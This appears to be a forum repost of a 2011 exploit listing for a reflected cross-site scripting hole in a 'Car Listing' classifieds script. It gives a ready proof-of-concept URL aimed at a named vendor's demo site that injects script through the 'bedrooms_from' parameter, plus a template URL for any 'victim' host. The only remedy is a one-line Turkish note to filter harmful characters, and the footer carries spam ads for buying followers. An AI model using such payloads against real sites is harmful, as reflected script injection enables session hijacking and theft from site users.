Car Listing ~ XSS Vuln.

endLesS

endLesS

Webmaster
< ------------------- header data start ------------------- >

# Application Name: Car Listing Cross Site Scripting Vuln.

# Author: expulse ~ Bug Researchers

# Date: 01.08.2011

# Example:

http://www.classifiedsgeek.com/car-listing/demo/preview.php?cont

roller=Listings&action=search&listing_search=1&type_id=&bedrooms

_from=>**********alert(document.domain)</script>

# Vulnerable Type: Reflected XSS

# Fixed: Zararlı Karakterler Filitrelenmelidir.


< -- bug code start -- >

http://victim/preview.php?controller=Listings&action=search&list

ing_search=1&type_id=&bedrooms_from=XSSAttack]

< -- bug code end of -- >

< ------------------- header data end of ------------------- >
 
Cevap yazmak için giriş yap yada kayıt ol.
bayigram takipçi satın al instagram beğeni satın al instagram takipçi satın al tiktok takipçi satın al Buy Followers haber
vozol puff
Geri
Üst